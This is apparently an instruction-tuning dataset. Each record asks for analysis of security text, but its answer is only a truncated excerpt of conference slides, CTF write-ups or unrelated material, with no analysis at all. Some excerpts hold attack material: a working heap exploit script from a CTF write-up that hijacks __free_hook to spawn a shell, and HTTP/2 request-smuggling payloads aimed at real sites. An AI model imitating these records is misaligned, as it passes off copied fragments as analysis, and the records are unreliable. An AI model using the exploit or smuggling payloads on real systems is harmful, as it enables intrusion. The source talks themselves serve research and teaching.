{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 8. 状态State ### Intent 允许对象在内部状态改变时改变它的行为对象看起来好像修改了它所属的类 ### Class Diagram <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/79df886f-fdc3-4020-a07f-c991bb58e0d8.png\"/> </div><br> ### Implementation 糖果销售机有多种状态每种状态下销售机有不同的行为状态可以发生转移使得销售机的行为也发生改变 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/396be981-3f2c-4fd9-8101-dbf9c841504b.jpg\" width=\"600\"/> </div><br> ```java public interface State { /** * 投入 25 分钱 */ void insertQuarter(); /** * 退回 25 分钱 */ void ejectQuarter(); /** * 转动曲柄 */ void turnCrank(); /** * 发放糖果 */ void dispense(); } ``` ```java public class HasQuarterState implements State { private GumballMachine gumballMachine; public HasQuarterState(GumballMachine gumballMachine) { this.gumballMachine = gumballMachine; } @Override public void insertQuarter() { System.out.println(\"You can't insert another quarter\"); } @Override public void ejectQuarter() { System.out.println(\"Quarter returned\"); gumballMachine.setState(gumballMachine.getNoQuarterState()); } @Override public void turnCrank() { System.out.println(\"You turned...\"); gumballMachine.setState(gumballMachine.getSoldState()); } @Override public void dispense() { System.out.println(\"No gumball dispensed\"); } } ``` ```java public class NoQuarterState implements State { GumballMachine gumballMachine; public NoQuarterState(GumballMachine gumballMachine) { this.gumballMachine = gumballMachine; } @Override public void insertQuarter() { System.out.println(\"You insert a quarter\"); gumballMachine.setState(gumballMachine.getHasQuarterState()); } @Override public void ejectQuarter() { System.out.println(\"You haven't insert a quarter\"); } @Override public void turnCrank() { System.out.println(\"You turned, but there's no quarter\"); } @Override public void dispense() { System.out.println(\"You need to pay first\"); } } ``` ```java public class SoldOutState implements State { GumballMachine gumballMachine; public SoldOutState(GumballMachine gum", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 . 1 One Gadget RCE david942j @ HITCON CMT 2017 2 . 1 Before Start 2 . 2 Q: 1. 2. 3. 2 . 3 3 . 1 Who Am I david942j CTF 4 . 1 Introduction 4 . 2 Hacker 4 . 3 4 . 4 Binary Services (PE / ELF) PE - Windows ELF - Linux Web Browser OS Kernel (privilege escalation) VM (VM escape) CTF 4 . 5 Binary Exploitation in CTF Binary Control PC Defeat ASLR Remote Code Execution 4 . 6 Binary Control PC Defeat ASLR Remote Code Execution Control PC Defeat ASLR 4 . 7 Defeat ASLR Binary Control PC Defeat ASLR Remote Code Execution Defeat ASLR 4 . 8 ASLR Linux kernel 2.6.12 (2005, June) 4 . 9 Defeat ASLR Information leak 4 . 10 Control PC Binary Control PC Defeat ASLR Remote Code Execution Control PC 4 . 11 Control PC Program Counter 4 . 12 Control PC = 4 . 13 Remote Code Execution Binary Control PC Defeat ASLR Remote Code Execution Remote Code Execution 4 . 14 DeASLR + Control PC = RCE 4 . 15 4 . 16 RCE = system(\"sh\") 4 . 17 system(\"sh\") DeASLR: system : system \"sh\" 5 . 1 One Gadget 5 . 2 5 . 3 RCE 5 . 4 5 . 5 (1) 5 . 6 DeASLR 5 . 7 (2) 5 . 8 PC 5 . 9 (3) 5 . 10 5 . 11 5 . 12 execve(\"/bin/sh\", argv, envp) 5 . 13 execve 5 . 14 execve int execve(const char *file, char *const argv[], char *const envp[]) syscall main(int argc, char **argv, char **envp){} execve(file, argv, envp) 5 . 15 Example ls -lh #include <unistd.h> int main() { char *const argv[] = {\"ls\", \"-lh\", NULL}; char *const envp[] = {NULL}; execve(\"/bin/ls\", argv, envp); } Demo 5 . 16 argv envp NULL array of pointers char *s[] = {ptr1, ptr2, ..., NULL} execve(file, {NULL}, {NULL}) (?) - NULL execve(file, NULL, NULL) 5 . 17 argv 5 . 18 argv argv=NULL Demo : /bin/sh  execve(\"/bin/sh\", NULL, NULL) 5 . 19 envp 5 . 20 envp environ  execve(.., NULL)  execve(.., {NULL})  execve(.., environ) 5 . 21 execve 5 . 22 system(cmd) fork() + execve(\"/bin/sh\", [\"sh\",\"-c\",cmd], environ) 5 . 23 source code of system pid = __fork (); (void) __execve (SHELL_PATH, (char *const *) new_argv, __environ); if (pid == (pid_t) 0) { /* Child side. */ const c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n从开发到漏洞挖掘的角色转换 王纬 2020-06-05 关于我  ID: Proteas  Weibo: @Proteas  Twitter: @ProteasWang  3 年 Windows C++ 开发经验  5 年 iOS App 开发经验  5 年 iOS & macOS 漏洞挖掘经验  目前处于技术理想主义与技术现实主义之间 主要内容  背景与约束  漏洞挖掘与利用  为什么要转漏洞挖掘  如何转到漏洞挖掘  结语 背景与约束  每个人眼里都有一个世界  每个人都有自己的局限性  经验是不可传承的  每个人都有属于自己的路  但仍希望本文能对你有所帮助 背景与约束  二进制方面的漏洞挖掘与利用  领域与目标默认指 macOS/iOS  面向开发人员 漏洞挖掘与利用  挖掘  漏洞挖掘研究的是什么  研究的是可以用于突破安全边界的编程错误  识别编程错误  触发编程错误的方法  自动高效发现编程错误的方法  本文中的编程错误指可以用于突破安全边界的编程错误 漏洞挖掘与利用  挖掘  大部分编程错误跟信任有关系  从广义的角度说  漏洞挖掘研究的是信任与欺骗 漏洞挖掘与利用  利用  漏洞利用研究的是控制与转化  下面是我在日报里写的一句话  编写 iOS 内核利用的过程实际是  以初始错误类型为起点  以内核空间任意地址读写为终点  不断提升控制内核数据能力的过程 漏洞挖掘与利用  利用  挖掘与利用所依赖的知识有共性  但是差别很大  待处理的问题  处理问题时的思维模式  个人认为这是两个不同的方向  相对于挖掘在没有公开套路的情况下  利用更具创造性艺术性 漏洞挖掘与利用  思维模式  下图是 Minizip 库的解压缩接口的截图 漏洞挖掘与利用  思维模式 漏洞挖掘与利用  思维模式  开发人员关注什么  大部分关注的是接口如何使用  一部分会关注  库的设计  库内部使用的算法  这跟我们所接受的专业训练有关系 漏洞挖掘与利用  思维模式  漏洞挖掘人员关注什么  攻击面即哪些数据是攻击者可控的  库内部的实现路径穿越符号问题溢出内存操作等  也会关注接口  主要看接口是否清晰易用  是否容易让开发者犯错 漏洞挖掘与利用  思维模式  开发直接性  看到的是接口关注的也是接口  漏洞挖掘与利用间接性  看到的是接口  关注的是数据对内部实现的影响  例子内核利用 漏洞挖掘与利用  对抗  开发者与厂商的利益是一致的  大家共处一个生态  本质上漏洞挖掘与厂商处于对抗状态  如果没有漏洞挖掘人员  厂商可以降低数量可观的成本  漏洞挖掘的同行之间撞洞 漏洞挖掘与利用  不确定性  开发人员及软件工程  为了保证确定性  追求的也是确定性  漏洞挖掘与利用领域涉及不确定性  尤其是当前的漏洞利用领域  这会让我们感觉很不舒服不可靠 漏洞挖掘与利用  支撑技术  开发领域的一些调侃  面向 Google 编程  面向 Github 编程  面向 QQ 群编程  这些在漏洞挖掘领域基本不存在  遇到的大部分问题都需要自己解决 漏洞挖掘与利用  工程化程度  工程化是为了保证结果  粗暴地讲就是如果这么做就可以得到结果  先定义结果再来看工程化程度  如果结果是打下目标那工程化程度非常低  如果结果是获得 CVE那工程化程度中等偏下 漏洞挖掘与利用  工程化程度  为什么要谈工程化程度因为产出  在开发人员的眼中应该不存在 0 产出的情况  但在漏洞挖掘领域结合具体的目标  是可能存在 0 产出情况的  为了避免这种情况  需要持续不断的思考总结学习对抗 漏洞挖掘与利用  习惯失败  在大部分情况下  开发人员在解决好不好的问题  漏洞挖掘与利用人员在解决能不能的问题 漏洞挖掘与利用  习惯失败  在实际的项目开发中  每天都可以输出代码  大部分需求都是可以实现的  在针对有实际价值的目标的漏洞挖掘过程中  基本不可能每天都发现漏洞  所发现的漏洞大部分都不可利用  所设计的利用方案  很可能在某个环节上被某个缓解措施阻止 漏洞挖掘与利用  习惯失败  这种情况会对开发人员造成心理冲击  如果内心不强大很可能会放弃  我们要习惯失败但仍对目标保有渴望  我们要在多次失败的情况下  继续保持研究的节奏 漏洞挖掘与利用  方法论  尖 à 专注 图片来源 http://m.6okok.com/wuqi/lenbingqi/6222.html 漏洞挖掘与利用  方法论  实战 à 实操 图片来源 https://zhuanlan.zhihu.com/p/34766047 漏洞挖掘与利用  价值观  开发领域大家的价值观比较统一  漏洞挖掘领域存在各种价值观  打下目标  CVE 致谢的数量  学术价值    没有对错好坏", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHTTP/2 The Sequel is Always Worse James Kettle Intro 2019-08: HTTP Desync Attacks 2020-09: The Bitbucket mystery 2021-01: Bitbucket confirmed but unexploitable 2021-03: Research collision 2021-03: Bitbucket breakthrough cascade - New, more powerful type of desync - Entire issue class becoming exploitable - Atlassian logging everyone out of Jira - Contacting CERT, awarding 3x{max bounty}  HTTP/2 desync attacks  Request tunnelling  HTTP/2 exploit primitives  HTTP/2 hacking pitfalls, tooling & defence Outline Live Q&A during stream: Discord: @albinowax Twitter: @albinowax user-agent burp x=123&y=4 :method POST :path :authority /login psres.net :method GET :path :authority /robots.txt psres.net POST /login HTTP/1.1\\r\\n Host: psres.net\\r\\n User-Agent: burp\\r\\n Content-Length: 9\\r\\n \\r\\n x=123&y=4 HTTP/1.1 403 Forbidden\\r\\n Content-Length: 6\\r\\n \\r\\n Failed GET / HTTP/1.1\\r\\n Host: psres.net\\r\\n \\r\\n HTTP/1.1 200 OK\\r\\n Content-Length: 26\\r\\n \\r\\n User-Agent: *\\r\\n Disallow: / Failed :status 403 User-Agent: * Disallow: / :status 403 HTTP/1.1 HTTP/2 StreamID: 1 StreamID: 1 StreamID: 3 StreamID: 3 HTTP/2 Desync Attacks Suggested prior reading: HTTP Desync Attacks Request Smuggling via HTTP/2 downgrades Classic request smuggling is CL.TE or TE.CL (exceptions apply) HTTP/2 downgrade smuggling is H2.CL or H2.TE H2.CL Desync POST /n HTTP/1.1 Host: www.netflix.com Content-Length: 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: barGET /anything HTTP/1.1 Host: www.netflix.com Zuul/Netty Back-end CVE-2021-21295 HTTP/1.1 200 OK HTTP/1.1 302 Found Location: https://02.rs?x.netflix.com/n Downgrade content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar :method POST :path :authority /n netflix.com :method GET :path :authority /anything netflix.com Front-end $20,000 POST /identity/XUI/ HTTP/1.1 Host: id.b2b.oath.com Content-Length: 68 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 Host: psres.net Content-Length: 10 x= H2.TE Desync: URL token hijack GET /b2blanding/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndefcon xv defcon xv hacker culture around the (corporate) world hacker culture around the (corporate) world luiz eduardo luiz eduardo defcon xv defcon xv hi hi  networking guy  security guy  works for mu security  wlan at security cons  regular speaker at security cons  defcon networking goon  founder of dc55.org  networking guy  security guy  works for mu security  wlan at security cons  regular speaker at security cons  defcon networking goon  founder of dc55.org defcon xv defcon xv disclaimer disclaimer  everything on this presentation is based on my own (sometimes, sick) thoughts  nothing here is based on my current employer thoughts, neither endorsed by them, other than actually allowing me to be here  and. dont believe anything i say (bruce potter tm)  everything on this presentation is based on my own (sometimes, sick) thoughts  nothing here is based on my current employer thoughts, neither endorsed by them, other than actually allowing me to be here  and. dont believe anything i say (bruce potter tm) defcon xv defcon xv why? why?  although the hacker community (in general) has the same goals, external factors actually contribute to make reality interestingly different sometimes  this actually bugged me. along with  the need for security awareness to grow due to everyone using the internet +  the whole corporate world so  although the hacker community (in general) has the same goals, external factors actually contribute to make reality interestingly different sometimes  this actually bugged me. along with  the need for security awareness to grow due to everyone using the internet +  the whole corporate world so defcon xv defcon xv look around you look around you  in security events you see people w/ different goals  in hacker conferences you see people w/ different goals  the growth in the number of insecure people  people have access to stuff they dont know, whats new? but.  god knows what some it folks think about security  youve already seen insecure peopl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCriminal Procedure Timeline ??? Stop Search Arrest Questions Appearance Bail Lets Make a Deal Trial ??? Something happens which causes the police to want to investigate you Stop Police are investigating something In order to stop you to investigate, police must have \"reasonable articulable suspicion\" that \"criminal activity is afoot\" - Terry v. Ohio Search In general* warrantless searches are unconstitutional due to the ban on unreasonable searches under the 4th Amendment Search In general* warrantless searches are unconstitutional due to the ban on unreasonable searches under the 4th Amendment * - Exceptions to Warrant Req. Terry - reasonable suspicion suspect is \"armed and dangerous\" Automobiles Arrest Border crossing Exigent Circumstances Destruction of Evidence Public Safety Permission Questioning Part 1 Miranda Warnings Right to Silence Right to an Attorney Miranda given when a person is \"in custody\" Miranda required if prosecutors later want to introduce what you say against you at trial Police are allowed to lie to you Questioning Part 2 Once you have been appointed or retained counsel on a particular case, you have additional rights to have your attorney present whenever police question you or you appear in court on that case Arrest Police must have probable cause to arrest In general, a person can be arrested for any crime (possibly even a traffic violation) First Appearance / Arraignment You may have an initial appearance where the only thing done is setting bail or releasing you. In many states, you have a right to bail. Realistically, bail is always set except in extremely serious cases (i.e. murder). Bail Cash bail only vs. Bail bonds First Appearance / Arraignment 2 At your arraignment, you will receive a list of the charges against you. You must have an attorney present to assist you at this point, or you will be appointed one. (sometimes bail setting will also be done at your arraignment) Charges Only the prosecutor (district attorney) gets to decide", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe cookie monster in your browsers @filedescriptor HITCON 2019 @filedescriptor  From Hong Kong   Pentester for Cure53  Love WebApp Sec & Browser Sec  Bug Bounty Hunter (#1 on Twitter's program) Motivation Motivation Motivation History 1966 The Dark Age 1994 1997 2000 Netscape's cookie_spec RFC 2109 RFC 2965 Basic Syntax Mechanism More Attributes Privacy Control Obsoletes RFC 2109 Set-Cookie2 & Cookie2 No browser followed these specs! The Modern Age 2011 2015 2016 2016 RFC 6265 Cookie Prefixes (RFC6265bis) Same-site Cookies (RFC6265bis) Strict Secure Cookies (RFC6265bis) Obsoletes RFC 2965 Summarizes reality HttpOnly flag Improves Integrity across subdomains over secure channel Kills CSRF & Co. Prevents secure cookies overwrite from non-secure origin                       HTTP/1.1 200 OK [...] Set-Cookie: sid=123; path=/admin document.cookie = 'lang=en' HTTP Response JavaScript API (write) HTTP/1.1 200 OK [...] Set-Cookie: sid=123; path=/admin document.cookie = 'lang=en' POST /admin HTTP/1.1 [...] Cookie: sid=123; lang=en HTTP Response JavaScript API (write) Subsequent HTTP Request document.cookie // sid=123; lang=en JavaScript API (read) *Attributes do not appear in requests Set-Cookie: sid=123; path=/admin; Secure Name Value Attribute Flag Attribute Flag Expires Max-Age Domain Path SameSite Secure HttpOnly Attribute Flag Expires Max-Age Domain Path SameSite Secure HttpOnly We will focus on these attributes in this talk Domain Set-Cookie: foo=bar; domain=.example.com example.com sub.example.com sub.of.sub.example.com   Domain to subdomains Set-Cookie: foo=bar; domain=.example.com sub.example.com example.com sub.of.sub.example.com   Subdomains to subdomains Set-Cookie: foo=bar; sub.example.com example.com sub.of.sub.example.com   Current domain Dot or no Dot?  They have no difference (old RFC vs new RFC style)  Both widen the scope of a cookie to all (sub)domains  The correct way to limit the scope is to not have the domain attribute  Some websites add the domain attribu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# randumb (pwn, 250 + 15 pt, solved by 4 teams) In this challenge, we're given an archive with compressed filesystem, kernel image and script for running an ARM virtual machine. ```sh drwxrwxr-x aleph/aleph 0 2018-04-09 17:37 ./randumb/ -rwxrwxr-x aleph/aleph 272 2018-04-09 17:37 ./randumb/chall -rwxrwxr-x aleph/aleph 2310840 2018-04-09 17:35 ./randumb/zImage -rw-rw-r-- aleph/aleph 1059651 2018-04-09 17:37 ./randumb/rootfs.img.gz ``` After extracting the filesystem we can see `randumb.ko`, which means that we're going to pwn the kernel. Fortunately, we don't have to reverse the binary as the chall author was nice and provided us with the source code located in `/src`. Randumb module provides a character device `/dev/randumb` functionally similar to `/dev/urandom` with additional ioctls used for configuration. By setting appropriate config, we can enable debug output which is written to `/tmp/randumb.log`. The function `debug_msg` looks quite interesting: ```c static int debug_msg(char *msg, ...) { // [...] old_fs = get_fs(); set_fs(KERNEL_DS); file = filp_open(DEBUG_FILE, O_WRONLY|O_CREAT|O_APPEND, 0644); if (IS_ERR(file)) return -EINVAL; // [....] } ``` Functions called by `debug_msg` (opening file, writing to file) are normally called from user mode. Thus those functions have to validate pointers passed to them. Otherwise users would be able to leak kernel memory. In order to bypass those checks, `set_fs` is used to increase the `addr_limit` in `thread_info` struct. From this moment, all pointers passed to syscalls either from user or kernel space will be valid. After doing this, function tries to open `/tmp/randumb.log` file for writing. If opening file fails, function immediately returns. And this is where the vulnerability occurs. Function doesn't restore `old_fs` before returning. If we can trigger this, we would be able to write into arbitrary memory with `read` syscall. OK, but how to cause an error when trying to open a file? Fortunately, if we try to open ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwww.quintessencelabs.com Are Quantum Computers Really A Threat To Cryptography? A Practical Overview Of Current State-Of-The-Art Techniques With Some Interesting Surprises 2018 QuintessenceLabs. All rights reserved. Commercial in Confidence. Data Uncompromised  Cryptography & Malware Researcher at TrustDefender  CTO @ ThreatMetrix  Quantum Technologies @ Qlabs  http://www.quintessencelabs.com About me 2 2018 QuintessenceLabs. All rights reserved. Commercial in Confidence. Data Uncompromised  Symmetric cryptosystem (shared secred key)  The same key (the secret key) is used to encrypt and decrypt the message  Examples: AES  Asymmetric cryptosystem (public & private key)  Use a public key to encrypt a message and a private key to decrypt it  Examples: RSA, ECC Cryptography 3 2018 QuintessenceLabs. All rights reserved. Commercial in Confidence. Data Uncompromised  Virtually all current cryptosystems are computationally secure  Not decodable with available computing power, but no proof that you cant break them  To factor a 2048-bit RSA key, the best classical algorithm needs ~ 1034 steps and ~317 trillion years on a classical ThZ Computer (with a trillion operations per second):  There are information-theoretic cryptosystems (e.g. One-Time-Pad)  However to enjoy the benefits of the proof, many assumptions must be met  E.g. secret key is truly random. Secret key has the same length as the message,  2018 QuintessenceLabs. All rights reserved. Commercial in Confidence. Data Uncompromised  Symmetric encryption (e.g. AES, 𝑁 = 256)  Key can be recovered classically with a computational complexity of 𝑂 2𝑁  Best quantum algorithm (Grover) provides only a squared speedup of 𝑂 2𝑁  While this is still a massive speedup, doubling the keylength will compensate for this  Asymmetric encryption (e.g. RSA, ECC)  Used virtually everywhere to negotiate a symmetric key (e.g. VPNs, TLS, Diffie- Hellman, Digital Signatures, )  Multiple quantum algorithms available  Focus for this talk Quantum", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFROM BOX TO BACKDOOR U s i n g O l d S c h o o l To o l s a n d Te c h n i q u e s t o D i s c o v e r B ac k doors in Modern Dev ic es Patrick DeSantis | @pat_r10t ADVANCED PERSISTENT THIRST (APT) ADVANCED PERSISTENT THIRST (APT) MOXA AWK-3131A WAP MOXA WAP: ABOUT The AWK-3131A is 802.11n compliant to deliver speed, range, and reliability to support even the most bandwidth-intensive applications. The 802.11n standard incorporates multiple technologies, including Spatial Multiplexing MIMO (Multi-In, Multi-Out), 20 and 40 MHz channels, and dual bands (2.4 GHz and 5 GHz) to provide high speed wireless communication, while still being able to communicate with legacy 802.11a/b/g devices. The AWK's operating temperature ranges from -25 to 60C for standard models and -40 to 75C for wide temperature models, and is rugged enough for all types of harsh industrial environments. Installation of the AWK is easy using DIN-Rail mounting or distribution boxes, and with its wide operating temperature range, IP30-rated housing with LED indicators, and DIN-Rail mounting it is a convenient yet reliable solution for all types of industrial wireless applications. - Moxa MOXA WAP: ABOUT TL;DR  Its an 802.11n Wireless Access Point (WAP)  in a din rail mountable enclosure  many of the the parts inside are the same as in common SOHO networking devices  Moxa advertises that the AWK series is  \"a Perfect Match for Your AGV & AS/RS Systems  Automated Guided Vehicles (AGV)  Automated Storage and Retrieval System (AS/RS)  common in Automated Materials Handling (AMH) systems MOXA WAP: ABOUT  Its Unbreakable MOXA WAP: DEVICE LIMITATIONS  Limited to about 8k connections per some unit of time  lots of resource exhaustion DoS issues  throttle traffic or wait for recovery  Crashes a lot  No legit operating system access  Very limited shell environment  most management and configuration done via web app  Crashes A LOT  so many crashes  often will reboot or need power cycle to recover  later, well have ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 威胁情报数据源整合 本篇整理公开的威胁情报数据源但公开不等于无版权注意哦 ## IOC Repositories > These repos contain threat intelligence generally updated manually when the respective orgs publish threat reports.[2] - https://github.com/aptnotes/data - https://github.com/citizenlab/malware-indicators - https://github.com/da667/667s_Shitlist - https://github.com/eset/malware-ioc - https://github.com/fireeye/iocs - https://github.com/Neo23x0/signature-base/tree/master/iocs - https://github.com/pan-unit42/iocs - https://github.com/stamparm/maltrail/tree/master/trails/static/malware - https://github.com/stamparm/maltrail/tree/master/trails/static/suspicious ## IOC Feeds > These URLs are data feeds of various types from scanning IPs from honeypots to C2 domains from malware sandboxes, and many other types. They were compiled from several sources, including (but not limited to): [1](https://github.com/mlsecproject/combine/issues/25), [2](https://github.com/mlsecproject/combine/blob/master/inbound_urls.txt), [3](https://github.com/mlsecproject/combine/blob/master/outbound_urls.txt), [4](https://github.com/stamparm/maltrail/tree/master/trails/feeds), [5](https://github.com/cloudsriseup/datasets/tree/master/osint/CIFConf), [6](https://github.com/TW-NCERT/ctifeeds). They are in alphabetical order.[2] - http://antispam.imp.ch/wormlist - http://app.webinspector.com/recent_detections - http://atrack.h3x.eu/api/asprox_suspected.php - http://autoshun.org/files/shunlist.csv - http://blocklist.greensnow.co/greensnow.txt - http://botscout.com/last.htm - http://botscout.com/last_caught_cache.htm - http://charles.the-haleys.org/ssh_dico_attack_hdeny_format.php/hostsdeny.txt - http://cinsscore.com/list/ci-badguys.txt - http://cybercrime-tracker.net/all.php - http://cybercrime-tracker.net/ccam.php - http://cybercrime-tracker.net/ccpmgate.php - http://danger.rulez.sk/projects/bruteforceblocker/blist.php - http://data.netlab.360.com/feeds/dga/dga.txt - http://data.netlab.360.com/feeds/ek/magnitude.txt - http://data.netlab.36", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefcon15 August 3-5, 2007 at the Riviera in Las Vegas A Journalist A Journalists Perspective on Security s Perspective on Security Research Research Peter Berghammer Peter Berghammer Defcon 15; Riviera, Las Vegas Defcon 15; Riviera, Las Vegas Friday August 3, 2007 Friday August 3, 2007 Day 1, Track 4 Day 1, Track 4 17:00 17:00  17:50 17:50 (05:00 (05:00--05:50 pm) 05:50 pm) Defcon15 August 3-5, 2007 at the Riviera in Las Vegas About me About me Peter Berghammer is the owner of a number of companies including Peter Berghammer is the owner of a number of companies including::  Copernio: an aerospace and defense contractor Copernio: an aerospace and defense contractor  Future Formats: a CE research and analysis company Future Formats: a CE research and analysis company  Tunitas Creek Ventures: a VC firm in the web 2.0 arena Tunitas Creek Ventures: a VC firm in the web 2.0 arena Additionally he writes (or has written for): Additionally he writes (or has written for):  Dealerscope: a monthly column covering politics, economics, and Dealerscope: a monthly column covering politics, economics, and corporate corporate ethics ethics  MediaLine: a monthly column covering security involving Hollywoo MediaLine: a monthly column covering security involving Hollywood studios, d studios, retailers and CE manufacturers retailers and CE manufacturers  CreativeCow: a bimonthly column covering developments within the CreativeCow: a bimonthly column covering developments within the professional film makers community professional film makers community  ODS!: occasional contributor regarding topics affecting the opti ODS!: occasional contributor regarding topics affecting the optical disc industry cal disc industry  One One--to to--One: occasional contributor on emerging technologies affecting t One: occasional contributor on emerging technologies affecting the he replication industry replication industry Defcon15 August 3-5, 2007 at the Riviera in Las Vegas Disclaimer Disclaimer The opin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntelligence by Susan Hasler (Thomas Dunne Books. St. Martins Press: New York 2010) A review by Richard Thieme There is enough white-hot rage in this book to steam a skunk. Take that as a compliment. Twenty-one years at the CIA in diverse capacities would generate post-traumatic stress in anyone, but not many can pen a narrative that addresses the relevant characters, issues, and complexities of that tenure. Intelligence pretty much does, within the constraints of agency pre-publication review. This book is more or less true, I believe, to its ultimate purpose, which is to channel the complex, sometimes contradictory vectors of energy that warred within the author during her 21 years of service into characters with conflicting points of view, emotions, and allegiances. If there is a flaw in the book, it is that those conflicts result in a happy ending at odds with the headlines, if not todays, then certainly tomorrows. You shall know the truth, and the truth shall set you free, reads the ironic quote at the entrance to the CIA, ironic because the biblical quote refers to that transcendent truth that includes and surpasses all lesser allegiances (which the biblical narrative casts as various forms of idolatry) whereas the agency is fused with the lesser purposes of the nation state that sanctions its work and methods. (I once asked a Naval intelligence analyst about the sticky problem of intelligence ethics, and he said, we have a code: dont lie, dont cheat, dont steal. But it doesnt say, Dont kill. Thats why we exist.) It gets messy, once one is assimilated into the inside circle of an agency like the CIA where those higher imperatives are lopped off at the start from the definition of the mission. Over time the addictive drug of being an insider consumes one. Having access to inside information, knowing what others can only guess, and often guess wrong, receiving reinforcement only from ones cohorts for the privilege of being special, exempt, and in the know, recei", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCompelled Decryption State of the Art Doctrinal Perversions by Ladar Levison Owner and Operator, Lavabit LLC Version 1.0 July 8th 2016 DEF CON 24 PRESENTATION PREVIEW PLEASE NOTE THESE SLIDES ARE PRELIMINARY EXPECT ALTERATIONS First Party vs Third Party Communications Assistance for Law Enforcement Act (aka CALEA) Third Parties Like Lavabit, Apple, WhatsApp, Telegram, Dell, Cisco or CentOS, OpenSSL CipherShed or Linus Torvalds, Gavin Andresen, Werner Koch or you Fin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWriteUp By Nu1L Author:Nu1L WriteUp By Nu1L PWN Honorbook Reverse print mips pypy WEB babyphp Crypto RRSSAA combinelfsr rw aes_baby PWN Honorbook risc-vpwnghidra addoff-by-one 0x300xf0,overlap from pwn import * s = remote(\"121.36.192.114\",\"9999\") # s = process(\"./qemu-riscv64 -g 1234 -L ./libs ./honorbook\",shell=True) # s = process(\"./qemu-riscv64 -L ./libs ./honorbook\",shell=True) def add(idx,name,msg): s.sendlineafter(\"Code:\",\"1\") s.sendlineafter(\"ID:\",str(idx)) s.sendlineafter(\"User name: \",name) s.sendafter(\"Msg: \",msg) def show(idx): s.sendlineafter(\"Code:\",\"3\") s.sendlineafter(\"ID:\",str(idx)) def free(idx): s.sendlineafter(\"Code:\",\"2\") s.sendlineafter(\"ID:\",str(idx)) def edit(idx,buf): s.sendlineafter(\"Code:\",\"4\") s.sendlineafter(\"Index:\",str(idx)) s.sendafter(\"Msg: \",buf) for i in range(0x10): add(i,'1',\"\\n\") for i in range(0xf): free(i) s.sendline('1'*0x500) for i in range(7): add(i,'1',\"\\n\") add(10,'\\n','\\n') context.log_level='debug' show(10) s.recvuntil(\"Msg: \") tmp = u64(s.recv(3).ljust(8,'\\x00')) success(hex(tmp)) libc = ELF('./libs/lib/libc-2.27.so') libc.address = tmp-0x10790a+0x4000000000 success(hex(libc.address)) free_hook = libc.sym['__free_hook'] system = libc.sym['system'] add(0x10,'1','1\\n') add(0x11,'2','2\\n') add(0x12,'3',(p64(0x21)*2)*10+'\\n') add(0x13,'4','4\\n') free(0x10) add(0x10,'1','A'*0xe8+'\\xf1') free(0x13) free(0x11) add(0x14,'5','A'*0x20+p64(0)+p64(0xf1)+p64(free_hook)+'\\n') add(0x15,'6','/bin/sh\\x00\\n') add(0x16,'7',p64(system)+'\\n') free(0x15) s.interactive() Reverse print https://hackmd.io/@Lays/SkKL68GIe?type=view#%F0%9F%94%84-R everse-500---printbf brainfuckbrainfuck2c 1266 6 from pwn import * context.log_level = 'debug' import os cl = 'e_C0d3' cl1 = [ ['G','g'], ['i','1','I'], ['V','v'], ['e','3','E'], ['_'], ['M','m'] ] cl2 = [ ['5'], ['h','H'], ['o','0','O'], ['w','W'], ['_'], ['M','m'] ] #revers cl1 = [ ['r','R'], ['e','E','3'], ['v','V'], ['e','E','3'], ['R','r'], ['s','S','5'] ] for j0 in cl1[0]: for j1 in cl1[1]: for j2 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# KasperskyLab Industrial CTF Quals 2017 Team: c7f.m0d3, akrasuski1, nazywam, shalom, rev ### Table of contents * [Bad computations (crypto)](bad_computations) * [Security home cameras (crypto)](cameras) * [Decrypt the message (crypto)](decrypt_message) * [Smart heater 1 (re/web)](heater_1)", "category": "text_analysis", "source": "security_papers"}
